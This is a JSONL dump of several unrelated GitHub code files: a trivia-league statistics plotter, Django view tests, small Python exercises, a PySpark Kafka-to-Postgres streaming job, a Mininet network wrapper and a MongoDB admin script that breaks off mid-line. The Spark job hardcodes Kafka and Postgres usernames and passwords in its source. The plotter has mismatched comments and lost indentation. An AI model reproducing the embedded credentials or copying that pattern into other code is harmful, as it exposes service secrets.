+{"seq_id":"29102398247","text":"import os\nimport shutil\nimport re\nimport urllib.request\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n\ndef get_season(season, league, rundle, division):\n    matchday = 1\n    div_string = f'_Div_{division}' if division else ''\n    url = f'https://www.learnedleague.com/match.php?{season}&{matchday}&{rundle}_{league}{div_string}'\n    fn = f'/Users/cda0201/personal/learnedleague/url.txt'\n    urllib.request.urlretrieve(url, fn)\n\n    with open(fn, \"r\") as fh:\n        contents = fh.read()\n    soup = BeautifulSoup(contents, 'html.parser')\n    for data in soup.find_all(\"p\"):\n        text = data.get_text()  # avoid shadowing the built-in sum\n        print(text)\n\ndef parse_match(match):\n    data = match.split('\\t')\n    pattern = re.compile(r'([^(])\\(([^)])\\)')\n    scores = pattern.findall(data[2])\n\n    a_mp = -1 if scores[0][1] == 'F' else int(scores[0][0])\n    b_mp = -1 if scores[1][1] == 'F' else int(scores[1][0])\n    a_pt = -1 if scores[0][1] == 'F' else 0\n    b_pt = -1 if scores[1][1] == 'F' else 0\n    a_ca = -1 if scores[0][1] == 'F' else int(scores[0][1])\n    b_ca = -1 if scores[1][1] == 'F' else int(scores[1][1])
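\n    # Scoring convention (per the logic below): 2 match points for a win,\n    # 1 apiece for a tie, 0 for a loss; a forfeit (\"F\") is recorded as -1.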
\n    if a_mp > b_mp:\n        a_pt = 2\n    elif b_mp > a_mp:\n        b_pt = 2\n    elif scores[0][1] != 'F':\n        a_pt = 1\n        b_pt = 1\n    match = ((data[1], a_ca, a_mp, a_pt),\n             (data[3], b_ca, b_mp, b_pt))\n    return match\n\n\ndef parse_matchday(matchday):\n    matches = list(filter(None, matchday.split('\\n')))\n    matches = [parse_match(match) for match in matches]\n    return matches\n\n\ndef parse_data(data_fn):\n    with open(data_fn, 'r') as h:\n        txt = h.read()\n    matchdays = list(filter(None, txt.split('\\n\\n')))\n    matchdays = [parse_matchday(matchday) for matchday in matchdays]\n    return matchdays\n\n\ndef luck(data_fn, player='DunnC4'):\n    matchdays = parse_data(data_fn)\n\n    n_matchdays = len(matchdays)\n    n_players = len(matchdays[0])*2\n\n    cas = np.zeros((n_matchdays, n_players - 1), dtype=int)\n    mps = np.zeros((n_matchdays, n_players - 1), dtype=int)\n    pts = np.zeros((n_matchdays, n_players - 1), dtype=int)\n    player_cas = np.zeros((n_matchdays, ), dtype=int)\n    player_cps = np.zeros((n_matchdays, ), dtype=int)\n    player_mps = np.zeros((n_matchdays, ), dtype=int)\n    player_pts = np.zeros((n_matchdays, ), dtype=int)\n    opp_cas = np.zeros((n_matchdays, ), dtype=int)\n    opp_mps = np.zeros((n_matchdays, ), dtype=int)\n    opp_pts = np.zeros((n_matchdays, ), dtype=int)\n    for d, matchday in enumerate(matchdays):\n        ind = 0\n        for match in matchday:\n            for r, result in enumerate(match):\n                if result[0] == player:\n                    player_cas[d] = result[1]\n                    player_mps[d] = result[2]\n                    player_pts[d] = result[3]\n                    opp_cas[d] = match[np.mod(r + 1, 2)][1]\n                    opp_mps[d] = match[np.mod(r + 1, 2)][2]\n                    opp_pts[d] = match[np.mod(r + 1, 2)][3]\n                    player_cps[d] = 2*(player_cas[d] > opp_cas[d]) + (player_cas[d] == opp_cas[d])*(player_cas[d] > -1) - (player_cas[d] == -1)\n                else:\n                    cas[d, ind] = result[1]\n                    mps[d, ind] = result[2]\n                    pts[d, ind] = result[3]\n                    ind += 1\n\n    cads = player_cas[:, np.newaxis] - cas\n    mpds = player_mps[:, np.newaxis] - mps\n    ptds = player_pts[:, np.newaxis] - pts\n    opp_cads = player_cas - opp_cas\n    opp_mpds = player_mps - opp_mps\n    opp_ptds = player_pts - opp_pts\n\n    ps = np.tile(player_cas[:, np.newaxis], (1, n_players - 1))\n    others = cas  # renamed from 'os' to avoid shadowing the os module\n    cad_points = 2*(ps > others) + (ps == others)*(ps > -1) - (ps < 0)\n\n    ps = np.tile(player_mps[:, np.newaxis], (1, n_players - 1))\n    others = mps\n    mpd_points = 2*(ps > others) + (ps == others)*(ps > -1) - (ps < 0)\n\n\n    fg, axs = plt.subplots(ncols=4, nrows=n_matchdays, figsize=(12, 8))\n    sources = [cads, cad_points, mpds, mpd_points]\n    opp_sources = [opp_cads, player_cps, opp_mpds, player_pts]\n    source_labels = ['Correct Answer Difference (opp <-> me)',\n                     'Points based on Correct Answers',\n                     'Match Point Difference (opp <-> me)',\n                     'Points']\n    source_ranges = [[-7, 7], [-1, 2], [-10, 10], [-1, 2]]\n    source_colors = ['k', 'dimgrey', 'b', 'g']\n\n    ofg, oaxs = plt.subplots(nrows=4, figsize=(8, 16))\n    for s in range(len(sources)):\n        max_count = -np.inf\n        bin_edges = np.arange(source_ranges[s][0], source_ranges[s][1] + 2) - .5\n        counts = np.zeros((n_matchdays, len(bin_edges) - 1), dtype=int)\n        ds = sources[s]\n        overall_d = np.ones((1, ))\n        for d, ax in enumerate(axs[:, s]):\n            counts[d, :], bins, patches = ax.hist(ds[d, :], bins=bin_edges, edgecolor='white', linewidth=1)\n\n            for i in range(0, opp_sources[s][d] - source_ranges[s][0]):\n                patches[i].set_facecolor(source_colors[s])\n            patches[opp_sources[s][d] - source_ranges[s][0]].set_facecolor('r')\n            for i in range(opp_sources[s][d] - source_ranges[s][0] + 1, len(patches)):\n                patches[i].set_facecolor(source_colors[s])\n\n            ax.set_xlim([source_ranges[s][0] - 1, 
source_ranges[s][1] + 1])\n if d == n_matchdays - 1:\n if s == 0 or s == 2:\n ax.set_xticks(np.arange(source_ranges[s][0] + 1, source_ranges[s][1])[::2])\n else:\n ax.set_xticks(np.arange(source_ranges[s][0], source_ranges[s][1] + 1))\n ax.set_xlabel(source_labels[s])\n else:\n ax.set_xticks([0, ])\n ax.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n labelbottom=False) # labels along the bottom edge are off\n if s == 1 and d == 0:\n ax.set_title(player)\n if s == 0:\n ax.set_ylabel(f'MD {d+1}')\n max_count = np.maximum(np.max(counts[d, :]), max_count)\n overall_d = np.convolve(overall_d, counts[d, :])\n\n bext = [source_ranges[s][0] * n_matchdays, source_ranges[s][1] * n_matchdays]\n _, _, patches = oaxs[s].hist(np.arange(bext[0], bext[1] + 1), weights=overall_d,\n bins=np.arange(bext[0], bext[1] + 2) - .5, edgecolor='white', linewidth=1, density=True)\n\n red_val = np.sum(opp_sources[s])\n red_ind = np.argmax(np.arange(bext[0], bext[1] + 1) == red_val)\n for i in range(0, red_ind):\n patches[i].set_facecolor(source_colors[s])\n patches[red_ind].set_facecolor('r')\n for i in range(red_ind + 1, len(patches)):\n patches[i].set_facecolor(source_colors[s])\n\n if s == 0 or s == 2:\n trim = np.minimum(np.argmax(overall_d > 0), np.argmax(overall_d[::-1] > 0))\n bext = [bext[0] + trim, bext[1] - trim]\n oaxs[s].set_xlim([bext[0] - 1, bext[1] + 1])\n else:\n oaxs[s].set_xlim([bext[0] - 1, bext[1] + 1])\n\n oaxs[s].set_xlabel(source_labels[s])\n if s == 0:\n oaxs[s].set_title(player)\n # ofg.savefig(f'/Users/cda0201/personal/learnedleague/{player}_overall_{s}_{d}.png')\n\n for ax in axs[:, s]:\n ax.set_ylim([0, max_count + 1])\n\n ofg.savefig(f'/Users/cda0201/personal/learnedleague/{player}_overall.png')\n\n fg.savefig(f'/Users/cda0201/personal/learnedleague/{player}.png')\n\n return\n\nif __name__ == '__main__':\n\n season = 92\n rundle = 'D'\n division = 1\n league = 'Citadel'\n get_season(season, league, rundle, division)\n\n season = 92\n rundle = 'D'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['DunnC4', 'CampbellJC', 'LouJ', 'Watson JrJ']\n for player in players:\n luck(data_fn, player)\n\n season = 92\n rundle = 'B'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['DunnGreg']\n for player in players:\n luck(data_fn, player)\n\n season = 92\n rundle = 'C2'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['WatsonJ3', 'WatsonL3']\n for player in players:\n luck(data_fn, player)\n\n # season = 86\n # rundle = 'R'\n # data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n # players = ['DunnC4']\n # for player in players:\n # luck(data_fn, player)","repo_name":"ccdunn/learnedleague","sub_path":"luck.py","file_name":"luck.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"645881004","text":"import tempfile\nimport shutil\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.test import TestCase, Client, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Group, Post, User, Comment, Follow\n\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\nUSERNAME = 'TestUser'\nUSERNAME_2 = 'TestUser_2'\nUSERNAME_3 = 'TestUser_3'\nUSERNAME_4 = 'TestUser_4'\nSLUG = 'test-slug'\nSLUG_2 = 
'test_slug_2'\n\nINDEX_URL = reverse('posts:index')\nPROFILE_URL = reverse('posts:profile', args=[USERNAME])\nGROUP_LIST_URL = reverse('posts:group_list', args=[SLUG])\nGROUP_LIST_URL_2 = reverse('posts:group_list', args=[SLUG_2])\nFOLLOW_URL = reverse('posts:follow_index')\nPROFILE_FOLLOW = reverse('posts:profile_follow', args=[USERNAME_2])\nPROFILE_UNFOLLOW = reverse('posts:profile_unfollow', args=[USERNAME_2])\n\nGIF = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewsTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.guest_client = Client()\n cls.user = User.objects.create_user(username=USERNAME)\n cls.user_2 = User.objects.create_user(username=USERNAME_2)\n cls.user_3 = User.objects.create_user(username=USERNAME_3)\n cls.user_4 = User.objects.create_user(username=USERNAME_4)\n cls.authorized_client = Client()\n cls.another_authorized = Client()\n cls.another_authorized_2 = Client()\n cls.authorized_client.force_login(cls.user)\n cls.another_authorized.force_login(cls.user_3)\n cls.another_authorized_2.force_login(cls.user_4)\n cls.image = SimpleUploadedFile(\n name='small.gif',\n content=GIF,\n content_type='image/gif'\n )\n cls.group = Group.objects.create(\n title='Тестовый заголовок',\n slug=SLUG,\n description='Тестовое описание',\n )\n cls.group_2 = Group.objects.create(\n title='Тестовый заголовок',\n slug=SLUG_2,\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n text='Тестовый текст',\n group=cls.group,\n author=cls.user,\n image=cls.image\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.user_3,\n text='Комментарий'\n )\n cls.follow = Follow.objects.create(\n user=cls.user_4,\n author=cls.user\n )\n cls.POST_DETAIL_URL = reverse('posts:post_detail', args=[cls.post.pk])\n cls.POST_EDIT_URL = reverse('posts:post_edit', args=[cls.post.pk])\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def test_show_correct_context(self):\n CASES = [\n (INDEX_URL, self.guest_client, 'page_obj'),\n (GROUP_LIST_URL, self.guest_client, 'page_obj'),\n (PROFILE_URL, self.authorized_client, 'page_obj'),\n (self.POST_DETAIL_URL, self.guest_client, 'post'),\n (FOLLOW_URL, self.another_authorized_2, 'page_obj')\n ]\n for url, client, context in CASES:\n with self.subTest(url=url):\n response = client.get(url)\n post = response.context[context]\n if context == 'page_obj':\n self.assertEqual(len(post), 1)\n post = post[0]\n self.assertEqual(post.id, self.post.id)\n self.assertEqual(post.text, self.post.text)\n self.assertEqual(post.group, self.group)\n self.assertEqual(post.author, self.post.author)\n self.assertEqual(post.image, self.post.image)\n\n def test_cache(self):\n \"\"\"Данные в кэше хранятся до его обновления/очистки\"\"\"\n response = self.guest_client.get(INDEX_URL)\n Post.objects.all().delete()\n self.assertEqual(\n response.content, self.guest_client.get(INDEX_URL).content\n )\n cache.clear()\n self.assertNotEqual(\n response.content, self.guest_client.get(INDEX_URL).content\n )\n\n def test_profile_in_context(self):\n \"\"\"Шаблон profile сформирован с правильным контекстом.\"\"\"\n response = self.authorized_client.get(PROFILE_URL)\n 
        self.assertEqual(response.context['author'], self.post.author)\n\n    def test_group_in_context_group_list(self):\n        \"\"\"The group_list template is rendered with the correct context.\"\"\"\n        response = self.guest_client.get(GROUP_LIST_URL)\n        group = response.context['group']\n        self.assertEqual(group, self.post.group)\n        self.assertEqual(group.slug, self.post.group.slug)\n        self.assertEqual(\n            group.description,\n            self.post.group.description\n        )\n        self.assertEqual(group.pk, self.post.group.pk)\n\n    def test_post_not_in_context(self):\n        CASES = [\n            (GROUP_LIST_URL_2, self.another_authorized, 'page_obj'),\n            (FOLLOW_URL, self.another_authorized, 'page_obj')\n        ]\n        for url, client, context in CASES:\n            with self.subTest(url=url):\n                page = client.get(url).context[context]\n                self.assertNotIn(self.post, page)\n\n    def test_profile_follow_follow(self):\n        \"\"\"An authorized user can follow other users.\"\"\"\n        self.authorized_client.get(PROFILE_FOLLOW)\n        self.assertTrue(Follow.objects.filter(\n            author__username=USERNAME_2, user=self.user\n        ).exists())\n\n    def test_profile_follow_unfollow(self):\n        \"\"\"An authorized user can remove other users from their\n        subscriptions.\"\"\"\n        self.authorized_client.get(PROFILE_UNFOLLOW)\n        self.assertFalse(Follow.objects.filter(\n            author__username=USERNAME_2, user=self.user\n        ).exists())\n\n    def test_pages_index_contains_correct_records(self):\n        \"\"\"The page shows the correct number of posts.\"\"\"\n        Post.objects.all().delete()\n        NUMBER_FOR_TEST = 3\n\n        count_posts = settings.POSTS_ON_PAGE + NUMBER_FOR_TEST\n        Post.objects.bulk_create(\n            Post(text='Test text',\n                 group=self.group,\n                 author=self.user\n                 ) for i in range(count_posts)\n        )\n        CASES = [\n            (INDEX_URL, settings.POSTS_ON_PAGE, self.guest_client),\n            (GROUP_LIST_URL, settings.POSTS_ON_PAGE, self.guest_client),\n            (PROFILE_URL, settings.POSTS_ON_PAGE, self.authorized_client),\n            (INDEX_URL + '?page=2', NUMBER_FOR_TEST, self.guest_client),\n            (GROUP_LIST_URL + '?page=2', NUMBER_FOR_TEST, self.guest_client),\n            (PROFILE_URL + '?page=2', NUMBER_FOR_TEST, self.authorized_client)\n        ]\n        for url, count_posts, client in CASES:\n            with self.subTest(url=url):\n                self.assertEqual(\n                    len(client.get(url).context['page_obj']),\n                    count_posts\n                )\n","repo_name":"Maxim-Smirnov-1998/hw05_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4612525416","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 16:20:11 2018\n\n@author: joshu\n\"\"\"\n\ninformation = input(\"Enter the information to make acronym: \")\ntemp_list = information.split()  # split() skips repeated spaces, avoiding empty tokens\n\nfor i in temp_list:\n    print(i[0].capitalize(), end='')","repo_name":"Jadams29/Coding_Problems","sub_path":"String Functions/Acronym.py","file_name":"Acronym.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"44041501694","text":"cpf = input('Enter your CPF, without commas or dashes: ')\n\ncontador = 0\ncontador2 = 0\nsomatotal = 0\nsomatotal2 = 0\ncpfnew = cpf[:-2]\n\nfor i in range(10, 1, -1):\n\n    num_cpf = cpfnew[contador]\n    contador+=1\n    soma = int(num_cpf) * i\n    somatotal += soma\n\nnovoDigito = 11 - (somatotal % 11)\nif novoDigito > 9:\n    novoDigito = 0\ncpfnew += str(novoDigito)\n\n\nfor j in range(11, 1, -1):\n    num_cpf2 = 
cpfnew[contador2]\n    contador2+=1\n    soma2 = int(num_cpf2)*j\n    somatotal2 += soma2\n\nnovoDigito2 = 11 - (somatotal2 % 11)\nif novoDigito2 > 9:\n    novoDigito2 = 0\ncpfnew+= str(novoDigito2)\n\nif cpf == cpfnew:\n    print(\"Valid CPF!\")\nelse:\n    print(\"Invalid CPF!\")","repo_name":"andersonxtrindade/pythonUdemy","sub_path":"AulasBasicas/validadeCpf.py","file_name":"validadeCpf.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32402188971","text":"#studentFileData\r\n\r\n# An exception for an empty file.\r\nclass FileEmpty(Exception):\r\n    def __init__(self):\r\n        super().__init__()\r\n\r\nmydict = {}\r\nfile = input(\"please input file name to process: \")\r\n\r\ntry:\r\n    results = open(file, 'rt')\r\n    lines = results.readlines()\r\n    results.close()\r\n    if len(lines) == 0:\r\n        raise FileEmpty()\r\n    for line in lines:\r\n        fname, sname, score = line.split(\" \")\r\n        name = fname+\" \"+sname\r\n        score = float(score)\r\n        if name in mydict.keys():\r\n            mydict[name] += score\r\n        else:\r\n            mydict[name] = score\r\n\r\nexcept IOError as e:\r\n    print(\"I/O error :\", str(e.errno), \", \", e)\r\nexcept FileEmpty:\r\n    print(\"source file empty\")\r\n\r\nfo = open(\"scores.txt\", 'wt')\r\n\r\nfor name, score in mydict.items():\r\n    line = name + \"\\t\" + str(score) + \"\\n\"\r\n    fo.write(line)\r\nfo.close()\r\n","repo_name":"stephenmcnicholas/PythonExamples","sub_path":"progs/studentResults_readFromFile.py","file_name":"studentResults_readFromFile.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26424180448","text":"import time\n\nfrom pyspark.sql import SparkSession, DataFrame\nfrom pyspark.sql.types import StructType, StructField, StringType, LongType\nfrom pyspark.sql.functions import from_json, to_json, col, lit, struct, unix_timestamp, current_timestamp\n\nSPARK_JARS_PACKAGES = \",\".join(\n    [\n        \"org.apache.spark:spark-sql-kafka-0-10_2.12:3.3.0\",\n        \"org.postgresql:postgresql:42.4.0\",\n    ]\n    )\n\nKAFKA_SECURITY_OPTIONS = {\n    'kafka.bootstrap.servers': 'rc1b-2erh7b35n4j4v869.mdb.yandexcloud.net:9091',\n    'kafka.security.protocol': 'SASL_SSL',\n    'kafka.sasl.mechanism': 'SCRAM-SHA-512',\n    'kafka.sasl.jaas.config': 'org.apache.kafka.common.security.scram.ScramLoginModule required username=\\\"de-student\\\" password=\\\"ltcneltyn\\\";',\n}\n\nPOSTGRES_SECURITY_OPTIONS = {\n    'url': 'jdbc:postgresql://localhost:5432/postgres',\n    'driver': 'org.postgresql.Driver',\n    'user': 'jovyan',\n    'password': 'jovyan',\n}\n\ndef spark_init() -> SparkSession:\n\n    spark = (SparkSession.builder\n                .appName(\"RestaurantSubscribeStreamingService\")\n                .config(\"spark.sql.session.timeZone\", \"UTC\")\n                .config(\"spark.jars.packages\", SPARK_JARS_PACKAGES)\n                .getOrCreate()\n            )\n\n    return spark\n\ndef read_kafka_stream(spark: SparkSession) -> DataFrame:\n\n    restaurant_read_stream_df = (spark.readStream\n                                 .format('kafka')\n                                 .options(**KAFKA_SECURITY_OPTIONS)\n                                 .option('subscribe', 'ivivchick_in')\n                                 .load()\n                                 )\n\n    return restaurant_read_stream_df\n\ndef transform(df: DataFrame) -> DataFrame:\n\n    incoming_message_schema = StructType(\n        [StructField(\"restaurant_id\", StringType(), True),\n         StructField(\"adv_campaign_id\", StringType(), True),\n         StructField(\"adv_campaign_content\", StringType(), True),\n         StructField(\"adv_campaign_owner\", StringType(), True),\n
StructField(\"adv_campaign_owner_contact\", StringType(), True),\n StructField(\"adv_campaign_datetime_start\", LongType(), True),\n StructField(\"adv_campaign_datetime_end\", LongType(), True),\n StructField(\"datetime_created\", LongType(), True)])\n\n filtered_read_stream_df = (df\n .withColumn('value', from_json(col('value').cast(StringType()), incomming_message_schema))\n .withColumn('key', col('key').cast(StringType()))\n .selectExpr('value.*', '*')\n .dropDuplicates(['restaurant_id', 'adv_campaign_id'])\n .withWatermark('timestamp', '5 minute')\n .filter((col('adv_campaign_datetime_end') > unix_timestamp(current_timestamp())) &\n (col('adv_campaign_datetime_start') < unix_timestamp(current_timestamp()))\n )\n )\n\n return filtered_read_stream_df\n\ndef read_from_postgres(spark: SparkSession) -> DataFrame:\n subscribers_restaurant_df = (spark.read\n .format('jdbc')\n .options(**POSTGRES_SECURITY_OPTIONS)\n .option('dbtable', 'subscribers_restaurants')\n .load()\n .select('restaurant_id', 'client_id')\n .distinct()\n )\n\n return subscribers_restaurant_df\n\ndef foreach_batch_function(df, epoch_id) -> None:\n perst_df = (df.select(\n col('restaurant_id'),\n col('adv_campaign_id'),\n col('adv_campaign_content'),\n col('adv_campaign_owner'),\n col('adv_campaign_owner_contact'),\n col('adv_campaign_datetime_start'),\n col('adv_campaign_datetime_end'),\n col('datetime_created'),\n col('client_id'),\n unix_timestamp(current_timestamp()).alias('trigger_datetime_created')\n )\n .persist()\n )\n\n (perst_df\n .withColumn('feedback', lit(None))\n .write\n .format('jdbc')\n .options(**POSTGRES_SECURITY_OPTIONS)\n .option('dbtable', 'subscribers_feedback')\n .mode(\"append\")\n .save()\n )\n\n (perst_df\n .select(to_json(\n struct(\n col('restaurant_id'),\n col('adv_campaign_id'),\n col('adv_campaign_content'),\n col('adv_campaign_owner'),\n col('adv_campaign_owner_contact'),\n col('adv_campaign_datetime_start'),\n col('adv_campaign_datetime_end'),\n col('datetime_created'),\n col('client_id'),\n col('trigger_datetime_created'),\n )).cast(StringType()).alias('value')\n )\n .write\n .format(\"kafka\")\n .options(**KAFKA_SECURITY_OPTIONS)\n .option('topic', 'ivivchick_out')\n .save()\n\n )\n perst_df.unpersist()\n\ndef main():\n\n spark = spark_init()\n stream_df = read_kafka_stream(spark)\n postgres_df = read_from_postgres(spark)\n\n filtered_stream_df = transform(stream_df)\n\n result_df = filtered_stream_df.join(postgres_df, ['restaurant_id'])\n\n query = (result_df.writeStream\n .trigger(processingTime='5 seconds')\n .foreachBatch(foreach_batch_function)\n .start())\n\n while query.isActive:\n print(f\"query information: runId={query.runId}, \"\n f\"status is {query.status}, \"\n f\"recent progress={query.recentProgress}\")\n time.sleep(15)\n\n try:\n query.awaitTermination()\n finally:\n query.stop()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ivivchik/de-project-sprint-8","sub_path":"src/scripts/restaurant_subscribe_streaming_service.py","file_name":"restaurant_subscribe_streaming_service.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4628318254","text":"import logging\nfrom dataclasses import asdict, dataclass\nfrom subprocess import run, PIPE\nfrom typing import List, Dict\n\nimport dacite\nfrom mininet.link import TCLink\nfrom mininet.net import Mininet\nfrom mininet.node import Host, Controller, RemoteController\nfrom mininet.util import dumpNetConnections\nfrom socket 
import gethostbyname_ex\nfrom sdnsandbox.topology import SDNSandboxTopologyCreator, TopologyCreatorFactory, Link, Switch\nfrom sdnsandbox.util import countdown\nfrom re import fullmatch\n\nlogger = logging.getLogger(__name__)\n\n\nclass SDNSandboxNetworkFactory(object):\n @staticmethod\n def create(network_conf):\n # we assume the first ip is enough, this works for both an IP address and DNS name\n controller_ip = gethostbyname_ex(network_conf['controller']['ip'])[2][0]\n controller = RemoteController('controller', ip=controller_ip, port=network_conf['controller']['port'])\n network_conf['controller'] = controller\n topology_creator = TopologyCreatorFactory.create(network_conf['topology_creator'])\n network_conf['topology_creator'] = topology_creator\n config = dacite.from_dict(data_class=SDNSandboxNetworkConfig, data=network_conf)\n return SDNSandboxNetwork(config)\n\n\n@dataclass\nclass Interface:\n num: int\n name: str\n net_meaning: str\n\n\n@dataclass\nclass SDNSandboxNetworkConfig:\n topology_creator: SDNSandboxTopologyCreator\n controller: Controller\n test_ping_all_full: bool = False\n\n\n@dataclass\nclass SDNSandboxNetworkData:\n interfaces: Dict[int, Interface]\n switches: Dict[int, Switch]\n switch_links: List[Link]\n\n\nclass SDNSandboxNetwork:\n def __init__(self, config: SDNSandboxNetworkConfig):\n self.config = config\n self.interfaces: Dict[int, Interface] = {}\n self.net = None\n\n def start(self):\n \"\"\"Create network and start it\"\"\"\n topology = self.config.topology_creator.create()\n self.net = Mininet(topo=topology, controller=lambda unneeded: self.config.controller, link=TCLink)\n self.net.start()\n\n logger.info(\"Waiting for the controller to finish network setup...\")\n countdown(logger.info, 3)\n\n dumpNetConnections(self.net)\n if self.config.test_ping_all_full:\n logger.info(\"Performing a full mesh ping to make sure the network is well connected...\")\n self.net.pingAllFull()\n switch_names = {sw.ID: sw.name for sw in self.config.topology_creator.switches.values()}\n self.interfaces = self.get_inter_switch_port_interfaces(switch_names)\n return self.net\n\n def stop(self):\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n logger.info(\"Stopping the network...\")\n self.net.stop()\n self.net = None\n self.interfaces = {}\n\n def get_hosts(self) -> List[Host]:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return self.net.hosts\n\n @staticmethod\n def get_interface_net_meaning(intf_name: str, switches: Dict[int, str]):\n split = intf_name.split('@')\n for switch in split:\n switch_name = switch.split('-')[0]\n switch_num = int(switch_name[1:])\n intf_name = intf_name.replace(switch_name + '-', switches[switch_num] + '-')\n return intf_name\n\n @staticmethod\n def get_inter_switch_port_interfaces(switches: Dict[int, str],\n port_re=\"s[0-9]+-eth[0-9]+@s[0-9]+-eth[0-9]+\",\n ip_a_getter=lambda:\n run([\"ip\", \"a\"], universal_newlines=True, stdout=PIPE, stderr=PIPE).stdout) \\\n -> Dict[int, Interface]:\n ip_a_out = ip_a_getter()\n interfaces = {}\n for line in ip_a_out.splitlines():\n # ignore none-main lines (those with extra data, not intf definition)\n if len(line) == 0 or line[0] == ' ':\n continue\n intf_split = line.split(':')\n intf_num = int(intf_split[0])\n intf_name = intf_split[1].strip()\n logger.debug(\"found interface #%d: \\n%s\", intf_num, intf_name)\n if fullmatch(port_re, intf_name):\n interfaces[intf_num] = 
Interface(intf_num,\n intf_name,\n SDNSandboxNetwork.get_interface_net_meaning(intf_name, switches))\n else:\n logger.debug(\"Interface %s doesn't have inter switch port name, irrelevant - dropped...\", intf_name)\n return interfaces\n\n def get_interfaces(self) -> Dict[int, Interface]:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return self.interfaces\n\n def get_network_data(self) -> SDNSandboxNetworkData:\n if not self.is_started(): raise RuntimeError(\"Can't run this when the network is not started first!\")\n return SDNSandboxNetworkData(self.interfaces,\n self.config.topology_creator.switches,\n self.config.topology_creator.switch_links)\n def is_started(self):\n return self.net != None\n","repo_name":"ScanLab-ossi/SDNSandbox","sub_path":"sdnsandbox/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25216741665","text":"#!/usr/bin/env python\n\nimport argparse\nimport ast\nimport os\nimport pymongo\nimport sys\n\npath = os.path.abspath(__file__)\npath = path.split(\"/\")\npath = \"/\".join(path[:-3])\nsys.path.append(path)\n\nfrom core.config import ConfParser\n\n\nclass CommandMgr(object):\n\n def __init__(self):\n \"\"\"\n Constructor of the service.\n \"\"\"\n self.config = ConfParser(\"ro.conf\")\n master_ro = self.config.get(\"master_ro\")\n self.mro_enabled = ast.literal_eval(master_ro.get(\"mro_enabled\"))\n\n self.TABLES = {\n \"domain.routing\":\n self.__get_table(\"domain.routing\"),\n \"resource.com.node\":\n self.__get_table(\"resource.com.node\"),\n \"resource.com.link\":\n self.__get_table(\"resource.com.link\"),\n \"resource.of.node\":\n self.__get_table(\"resource.of.node\"),\n \"resource.of.link\":\n self.__get_table(\"resource.of.link\"),\n \"resource.se.link\":\n self.__get_table(\"resource.se.link\"),\n \"resource.se.node\":\n self.__get_table(\"resource.se.node\"),\n \"resource.tn.link\":\n self.__get_table(\"resource.tn.link\"),\n \"resource.tn.node\":\n self.__get_table(\"resource.tn.node\"),\n \"topology.slice\":\n self.__get_table(\"topology.slice\"),\n \"topology.slice.sdn\":\n self.__get_table(\"topology.slice.sdn\"),\n \"scheduler.jobs\":\n self.__get_table(\"scheduler.jobs\"),\n \"domain.info\":\n self.__get_table(\"domain.info\"),\n \"topology.physical\":\n self.__get_table(\"topology.physical\"),\n }\n\n def __get_table(self, table_name):\n db_name = \"felix_ro\"\n if self.mro_enabled:\n db_name = \"felix_mro\"\n return getattr(getattr(pymongo.MongoClient(), db_name), table_name)\n\n def __select(self, table, name):\n print(\"\\n\\n\" + \"(RO) %s has %d rows\\n\" % (name, table.count()))\n for row in table.find():\n print(\"%s\" % (row))\n\n def __delete(self, table, name):\n table.remove()\n print(\"\\n\\n\" + \"Deleted all rows of (RO) %s\" % (name))\n\n def list_tables(self):\n print(\"\\n\\nManaged Tables: %s\\n\\n\" % self.TABLES.keys())\n\n def select_routing_table(self):\n self.__select(self.TABLES[\"domain.routing\"],\n \"domain.routing\")\n\n def select_ofdatapath_table(self):\n self.__select(self.TABLES[\"resource.of.node\"],\n \"resource.of.node\")\n\n def select_oflink_table(self):\n 